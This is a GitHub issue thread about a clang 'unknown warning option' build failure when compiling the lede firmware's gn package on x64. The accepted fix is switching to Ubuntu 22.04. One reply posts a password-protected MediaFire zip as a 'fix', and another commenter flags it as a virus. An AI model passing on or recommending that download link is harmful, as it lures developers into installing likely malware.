coolsnowwolf/lede #12434: x64编译错误，请问clang用的是哪个版本呢

es202517, 2024-08-29:
### 详细叙述

编译时提示找不到clang指令，设置完后出现其它提示不知道是不是版本问题

### 重复 issue

- [X] 没有类似的 issue

### 具体型号

x64

### 详细日志

touch /home/lw/lede/staging_dir/target-x86_64_musl/root-x86/stamp/.resolveip_installed
echo "resolveip" >> /home/lw/lede/staging_dir/target-x86_64_musl/pkginfo/resolveip.default.install
make[3]: Leaving directory '/home/lw/lede/package/network/utils/resolveip'
time: package/network/utils/resolveip/compile#0.25#0.05#0.48
make[3]: Entering directory '/home/lw/lede/package/utils/lua'
make[3]: Leaving directory '/home/lw/lede/package/utils/lua'
time: package/utils/lua/host-compile#0.15#0.03#0.22
make[3]: Entering directory '/home/lw/lede/feeds/helloworld/gn'
MAKEFLAGS="" /home/lw/lede/staging_dir/host/bin/ninja  -j1 -C /home/lw/lede/build_dir/hostpkg/gn-2024-08-13-54f5b539/out
ninja: Entering directory `/home/lw/lede/build_dir/hostpkg/gn-2024-08-13-54f5b539/out'
[1/295] CXX src/base/command_line.o
FAILED: src/base/command_line.o 
clang++ -MMD -MF src/base/command_line.o.d -I../src -I. -DNDEBUG -O3 -fdata-sections -ffunction-sections -Werror -D_FILE_OFFSET_BITS=64 -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -pthread -pipe -fno-exceptions -fno-rtti -fdiagnostics-color -Wall -Wextra -Wno-unused-parameter -Wextra-semi -Wundef -std=c++20 -Wrange-loop-analysis -Wextra-semi-stmt -Wno-deprecated-copy -Wno-implicit-fallthrough -Wno-redundant-move -Wno-unused-variable -Wno-format -Wno-strict-aliasing -Wno-cast-function-type -c ../src/base/command_line.cc -o src/base/command_line.o
error: unknown warning option '-Wno-cast-function-type'; did you mean '-Wno-bad-function-cast'? [-Werror,-Wunknown-warning-option]
ninja: build stopped: subcommand failed.
make[3]: *** [Makefile:58: /home/lw/lede/build_dir/hostpkg/gn-2024-08-13-54f5b539/.built] Error 1
make[3]: Leaving directory '/home/lw/lede/feeds/helloworld/gn'
time: package/feeds/helloworld/gn/host-compile#0.17#0.09#1.94
    ERROR: package/feeds/helloworld/gn [host] failed to build.
make[2]: *** [package/Makefile:114: package/feeds/helloworld/gn/host/compile] Error 1
make[2]: Leaving directory '/home/lw/lede'
make[1]: *** [package/Makefile:110: /home/lw/lede/staging_dir/target-x86_64_musl/stamp/.package_compile] Error 2
make[1]: Leaving directory '/home/lw/lede'
make: *** [/home/lw/lede/include/toplevel.mk:231: world] Error 2

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

es202517, 2024-08-29:
> 下载 https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file 密码：changeme 在安装程序菜单中，选择“gcc”。

感谢，但我是Debian系统编译x64的lede，请问这个能在linux下使用么？

asdertypo, 2024-09-01:
同问，我也出现这个错误了：unknown warning option '-Wno-cast-function-type'

asdertypo, 2024-09-01:
> > 用Ubuntu2204安装clang试下，之前debian11也是报错，换成ubuntu2204就好了，估计gcc版本太低了，或者自己编译安装gcc12理论也可以
> 
> 好的 我试试

同问，我也出现这个错误：unknown warning option '-Wno-cast-function-type'

EricChen1, 2024-09-01:
> > 下载 https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file 密码：changeme 在安装程序菜单中，选择“gcc”。
> 
> 感谢，但我是Debian系统编译x64的lede，请问这个能在linux下使用么？

不要下载，那个是病毒，没打开过，但是估计那个链接已经被mediafire那边处理了

es202517, 2024-09-03:
> 用Ubuntu2204安装clang试下，之前debian11也是报错，换成ubuntu2204就好了，估计gcc版本太低了，或者自己编译安装gcc12理论也可以

此方法可行

es202517, 2024-09-07:
用Ubuntu2204安装clang试下，换成ubuntu2204就好了，

closed 2024-09-07 by es202517